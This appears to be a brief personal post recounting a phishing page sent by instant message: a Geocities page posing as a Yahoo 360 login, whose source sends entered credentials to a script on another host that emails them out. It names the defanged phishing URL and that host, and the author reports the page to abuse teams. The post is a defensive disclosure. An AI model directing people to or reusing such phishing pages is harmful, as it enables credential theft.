I just got an IM from a buddy. He told me to go to www(dot)geocities(dot)com(slash)picc_81(slash)index.htm
This appeared to be a Yahoo 360 login page. "Odd," I thought, "Why do I need to login to see a Geocities page? And anyway, aren't I already logged into Yahoo?"
Let's view the source. Oh. It sends the login credentials to a script on www2.fiberbit.net -- looks like it emails them to firstname.lastname@example.org
Nice job, phish boy.
I've reported it to PIRT, the Gmail guys, and the Google Safe Browsing folks.
Now to contact my buddy and give him the bad news.